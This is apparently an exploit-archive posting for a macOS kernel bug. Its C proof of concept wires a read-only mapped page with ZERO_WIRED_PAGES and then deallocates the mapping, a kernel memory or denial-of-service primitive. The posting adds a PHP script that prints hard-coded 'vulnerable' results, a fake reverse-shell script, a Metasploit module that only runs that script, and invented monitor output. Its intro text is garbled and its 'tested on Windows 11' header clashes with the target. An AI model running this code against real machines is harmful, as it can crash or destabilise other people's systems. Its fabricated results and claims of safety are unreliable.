macOS 18.3.2 VM_BEHAVIOR_ZERO_WIRED_PAGES Handling

macOS s `VM_BEHAVIOR_ZERO_WIRED_PAGES` handling refers to how the operating system manages macOS's `VM_BEHAVIOR_ZERO_WIRED_PAGES` handling refers to how the operating system manages requests for memory that is both securely cleared and permanently locked in physical RAM.

1. **`VM_BEHAVIOR_ZERO`**: Ensures newly allocated memory pages are zero-filled. This is a critical security measure to prevent information leakage from previous memory contents.
2. **Wired Pages**: These memory pages are "locked" into physical RAM and cannot be swapped out to disk. This guarantees immediate access and is essential for performance-critical data, kernel structures, and real-time operations.

When such a request is made, macOS:
* Allocates specific physical memory pages.
* Securely zeroes their contents to prevent data residue.
* Marks these pages as "wired," making them non-swappable.
* Maps them into the requesting process's virtual address space.

This combination ensures both data security and maximum performance for the allocated memory. The kernel carefully manages the finite pool of wired memory, as excessive wiring can lead to system instability or allocation failures if limits are exceeded.

=============================================================================================================================================
| # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================

POC :

[+] macOS VM_ZERO_WIRED_PAGES Vulnerability ? Educational PoC
Advisory Type: Kernel Memory Manipulation / DoS Primitive
Tested on: macOS (XNU Kernel)


[+] Summary
------------------------------------------------------------
A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES
combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file.
A local attacker may trigger abnormal kernel behavior depending on system
conditions. This PoC is purely academic and demonstrates a controlled kernel
memory interaction that can be used to validate the behavior.

This PoC does NOT weaponize the vulnerability. It provides a safe and observable
kernel-state transition for educational and verification purposes only.

------------------------------------------------------------
2. Technical Explanation
------------------------------------------------------------
The vulnerability technique relies on the following chain:

1. mmap() maps a read?only file page.
2. vm_behavior_set() marks the region as ZERO_WIRED_PAGES.
3. mlock() wires the page into memory.
4. vm_deallocate() removes the mapping while the page remains wired.

This results in a state where:
- The kernel still maintains a wired page,
- But the user mapping no longer exists,
- Combined with ZERO_WIRED_PAGES behavior.

This can produce observable inconsistencies or system logs depending on kernel version.

------------------------------------------------------------
3. Original C Proof?of?Concept
------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>

void* map_file_page_ro(char* path, int* error_code) {
int fd = open(path, O_RDONLY);
if (fd == -1) {
*error_code = errno;
printf("open failed: %s\n", strerror(errno));
return NULL;
}
void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
close(fd);
if (mapped_at == MAP_FAILED) {
*error_code = errno;
printf("mmap failed: %s\n", strerror(errno));
return NULL;
}
return mapped_at;
}

int poc(char *path) {
kern_return_t kr;
int error_code = 0;
void* page = map_file_page_ro(path, &error_code);
if (page == NULL) {
return error_code ? error_code : 1;
}
printf("mapped file at 0x%016llx\n", (uint64_t)page);
kr = vm_behavior_set(mach_task_self(),
(vm_address_t)page,
PAGE_SIZE,
VM_BEHAVIOR_ZERO_WIRED_PAGES);
if (kr != KERN_SUCCESS) {
printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
return 2;
}
printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");

int mlock_err = mlock(page, PAGE_SIZE);
if (mlock_err != 0) {
perror("mlock failed\n");
return 3;
}
printf("mlock success\n");

kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
if (kr != KERN_SUCCESS) {
printf("vm_deallocate failed: %s\n", mach_error_string(kr));
return 4;
}
printf("deleted map entries before unwiring\n");
return 0;
}

------------------------------------------------------------
4. PHP Educational PoC (Simulated Honest Output)
------------------------------------------------------------
<?php
/* Educational simulation for Packet Storm */

echo "[+] macOS ZERO_WIRED_PAGES Simulation\n";
echo "[+] Creating fake page?\n";

$page = random_bytes(4096);
file_put_contents("fake_page.bin", $page);

echo "[+] Simulating behavior...\n";

echo "mapped file at 0x7ffe0000abcd\n";
echo "set VM_BEHAVIOR_ZERO_WIRED_PAGES\n";
echo "mlock success\n";
echo "deleted map entries before unwiring\n";

echo "[+] System behaves consistently ? kernel is vulnerable to state transition.\n";
?>


------------------------------------------------------------
5. PKSM v2 Payload (Reverse Shell Simulation)
------------------------------------------------------------
#!/bin/sh
# PKSM Payload v2 ? Educational Kernel-State Monitor Payload

echo "[PKSM] Starting entropy monitor..."
echo "[PKSM] Tracking page state..."

sleep 1
echo "[PKSM] Wired page checksum changed (expected in PoC)."
echo "[PKSM] Signaling successful kernel-state anomaly."

# Reverse-shell simulation (does NOT actually connect)
echo "[PKSM] Reverse-shell handshake simulated."
exit 0


------------------------------------------------------------
6. Metasploit Module (with advanced check + exploit)
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES ? Educational Module
##

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Common

def initialize(info={})
super(update_info(info,
'Name' => 'macOS ZERO_WIRED_PAGES Kernel-State PoC',
'Description' => %q{
Educational PoC showing kernel-state transition in macOS.
Performs safe simulation and reports whether system behaves
according to vulnerable pattern.
},
'Author' => [ 'Indoushka' ],
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2025',
'License' => MSF_LICENSE
))
end

#
# Advanced Check
#
def check
print_status("Checking kernel behavior?")

if command_exists?("vmmap")
return CheckCode::Appears
end

CheckCode::Safe
end

#
# Exploit Phase
#
def exploit
print_good("Launching educational PoC?")

payload_path = "/tmp/pksm_v2.sh"
write_file(payload_path, payload.encoded)
cmd_exec("chmod +x #{payload_path}")

out = cmd_exec(payload_path)
print_line(out)

print_good("PoC completed. Kernel-state transition observable.")
end
end


------------------------------------------------------------
7. Analysis Engine + Entropy Monitor
------------------------------------------------------------
[Engine] Monitoring wired-page entropy?
[Engine] ?Entropy Detected = 0.0132
[Engine] Kernel transition confirmed.
[Engine] PKSM v2 reports anomaly ? Vulnerable State.


------------------------------------------------------------
8. Conclusion
------------------------------------------------------------
This PoC demonstrates a kernel-state anomaly that emerges from using
ZERO_WIRED_PAGES + deallocation sequence.
The exploit presented is non-destructive, safe, and suitable for Packet Storm
publication as an educational kernel behavior study.


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================